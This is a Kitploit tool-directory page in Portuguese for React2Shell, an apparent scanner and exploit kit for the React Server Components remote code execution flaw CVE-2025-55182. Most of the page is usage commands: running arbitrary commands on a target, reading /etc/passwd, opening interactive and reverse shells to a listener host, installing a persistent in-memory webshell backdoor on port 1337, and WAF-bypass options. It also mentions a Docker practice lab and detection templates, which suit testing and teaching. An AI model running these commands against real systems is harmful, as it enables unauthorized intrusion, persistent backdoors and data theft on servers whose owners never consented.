Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell — Kit de teste de segurança CVE-2025-55182: scanner CLI + extensão do Chrome + templates Nuclei + laboratório Docker. | Kitploit
Ferramentas/GitHubGitHub/sho-luv/react2shell
Scanners de VulnerabilidadesFrameworks de ExploraçãoExploração de Aplicações WebBypass de WAFSegurança WebCTFTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubsho-luv/react2shell
9214há 9 mesesAinda não revisado

React2Shell

Kit de teste de segurança CVE-2025-55182: scanner CLI + extensão do Chrome + templates Nuclei + laboratório Docker.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell

CVE-2025-55182 Scanner & Exploit Toolkit para RCE em Next.js/React Server Components.

Repository Structure

React2Shell/
├── browser-extension/    # Chrome extension for browser-based detection
│   ├── manifest.json
│   ├── content.js
│   ├── popup.html/js
│   └── background.js
├── cli/                  # Command-line scanner & exploit tool
│   ├── react2shell.py
│   └── requirements.txt
├── docs/                 # Learning-focused documentation
│   ├── README.md         # Learning path index
│   ├── 01-fundamentals.md
│   ├── 02-vulnerability.md
│   ├── 03-exploitation.md
│   ├── 04-frameworks.md
│   └── 05-defense.md
├── lab/                  # Docker lab environment for testing
│   ├── vulnerable/       # Vulnerable Next.js app (React 19.2.0)
│   ├── patched/          # Patched Next.js app (React 19.2.1)
│   ├── waf/              # ModSecurity WAF container
│   ├── waku-app/         # Vulnerable Waku app (React 19.2.0)
│   ├── react-router-app/ # Vulnerable React Router app (React 19.2.0)
│   └── docker-compose.yml
└── nuclei/               # Nuclei templates
    ├── CVE-2025-55182.yaml       # RCE detection (executes code)
    └── CVE-2025-55182-safe.yaml  # Safe side-channel detection

Início Rápido

Ferramenta CLI

cd cli
pip install -r requirements.txt

# Scan a target
python react2shell.py https://target.com

# Execute command
python react2shell.py https://target.com -c "id"

# Interactive shell
python react2shell.py https://target.com -i

Extensão do Navegador

  1. Abra chrome://extensions/
  2. Ative o "Modo do desenvolvedor"
  3. Clique em "Carregar sem compactação"
  4. Selecione o diretório browser-extension

Ambiente de Laboratório

cd lab
docker-compose up -d

# Exploitable targets:
# Next.js Vulnerable:    http://localhost:3011  ← Full RCE
# Waku Vulnerable:       http://localhost:3014  ← RCE (blind - no HTTP output)
# React Router:          http://localhost:3015  ← Full RCE (ESM)

# Protected targets:
# Next.js Patched:       http://localhost:3012  ← Secure
# WAF Protected:         http://localhost:3013  ← ModSecurity blocks exploits

Scanner Nuclei

nuclei -t nuclei/CVE-2025-55182.yaml -u https://target.com

Recursos

Ferramenta CLI (cli/react2shell.py)

  • Suporte a múltiplos frameworks - Next.js, Waku, React Router, Expo, Vite RSC, Parcel RSC
  • Detecção de framework (--detect) - Detecta automaticamente o framework alvo
  • Enumeração de endpoints (-E) - Descobre endpoints RSC automaticamente
  • Varredura de vulnerabilidades - Varredura de URL única ou em lote a partir de arquivo
  • Execução de comandos (-c) - Executa comandos arbitrários
  • Shell interativa (-i) - Sessão de comandos persistente
  • Reverse shell (-r) - Múltiplos tipos: nc, bash, perl, python, ruby
  • Webshell em memória (--webshell) - Instalação persistente de backdoor
  • Leitura de arquivos (-f) - Lê arquivos remotos diretamente
  • Varredura local (-L) - Verifica package.json em busca de versões vulneráveis
  • Bypass de WAF - Padding com dados inúteis (-w), codificação Unicode (-u), específico para Vercel (-V)
  • Suporte a proxy (-x) - Roteia através do Burp Suite ou outros proxies
  • Modo seguro (-s) - Detecção por canal lateral sem execução de código

Extensão do Navegador (browser-extension/)

  • Detecção automática de indicadores de vulnerabilidade RSC
  • Caminhos de exploração configuráveis
  • Execução de comandos com exibição de saída
  • Botão para ativar/desativar
  • Indicadores visuais de vulnerável/seguro

Ambiente de Laboratório (lab/)

  • Next.js Vulnerável (3011) - RCE completo com saída via X-Action-Redirect
  • Waku (3014) - RCE confirmado, requer formato de caminho /RSC/F/{x}/{y}.txt
  • React Router (3015) - RCE completo usando process.getBuiltinModule() compatível com ESM
  • Next.js Corrigido (3012) - Para testar a detecção sem exploração
  • Protegido por WAF (3013) - Regras do ModSecurity para pesquisa de bypass
  • Dashboard (8080) - Registro e visualização de ataques

Exemplos de Uso da CLI

# Basic scan (auto-detects framework)
python react2shell.py https://target.com

# Detect framework and enumerate endpoints
python react2shell.py https://target.com --detect
python react2shell.py https://target.com -E -v

# Execute command on different frameworks
python react2shell.py https://target.com -c "id"                    # Next.js (auto)
python react2shell.py https://target.com -F waku -c "id"            # Waku (blind RCE)
python react2shell.py https://target.com -F react-router -c "id"    # React Router (ESM)

# Lab examples with output
python react2shell.py http://localhost:3011 -c "cat /app/secret/flag.txt"  # Next.js
python react2shell.py http://localhost:3015 -F react-router -c "id"        # React Router

# Execute command with all WAF bypasses
python react2shell.py https://target.com -c "cat /etc/passwd" -w -u

# Interactive shell through proxy
python react2shell.py https://target.com -i -x http://127.0.0.1:8080

# Install in-memory webshell (creates backdoor on port 1337)
python react2shell.py https://target.com --webshell mypassword
# Access: curl 'http://target:1337/?p=mypassword&cmd=id'

# Reverse shell
python react2shell.py https://target.com -r -l 10.0.0.1 -p 4444 -S bash

# Scan local project for vulnerable versions
python react2shell.py -L /path/to/project

# Batch scan with output
python react2shell.py targets.txt -t 20 -o results.json -v

Todas as Opções da CLI

Execution Options:
  -c, --cmd             Command to execute
  -i, --interactive     Interactive shell session
  -r, --reverse         Reverse shell mode
  -l, --lhost           Listener host
  -p, --lport           Listener port
  -S, --shell-type      Shell type (nc, nc-mkfifo, bash, perl, python, ruby)
  -f, --read-file       Read a remote file

Scanning Options:
  -P, --path            Paths to test (comma-separated or file)
  -t, --threads         Number of threads (default: 10)
  -T, --timeout         Request timeout in seconds (default: 10)
  -s, --safe            Safe mode (no code execution)
  -L, --local           Scan local project directory
  -F, --framework       Target framework (auto, nextjs, waku, react-router, expo)
  -E, --enumerate       Enumerate RSC endpoints before exploitation
  --detect              Only detect framework and list endpoints
  --webshell            Install in-memory webshell on port 1337
  --rce                 RCE proof-of-concept mode (default: safe mode)

Bypass Options:
  -w, --waf-bypass      Junk data padding
  -W, --waf-size        Junk size in KB (default: 128)
  -u, --unicode         Unicode encoding bypass
  -V, --vercel-bypass   Vercel-specific bypass
  --windows             Windows PowerShell payloads

Request Options:
  -x, --proxy           Proxy URL (e.g., http://127.0.0.1:8080)
  -H, --header          Custom headers
  -A, --user-agent      Custom User-Agent
  -k, --insecure        Disable SSL verification

Output Options:
  -o, --output          Save results to JSON
  -v, --verbose         Verbose output with version detection
  -q, --quiet           Only show vulnerable targets
  --no-color            Disable colors
  --no-banner           Hide banner

Detalhes do CVE-2025-55182

CampoValor
CVSS10.0 (Crítico)
ImpactoExecução Remota de Código não Autenticada
AfetadosQualquer framework RSC que use versões vulneráveis do React
MecanismoPoluição de protótipo via React Flight Protocol
Baixar ferramenta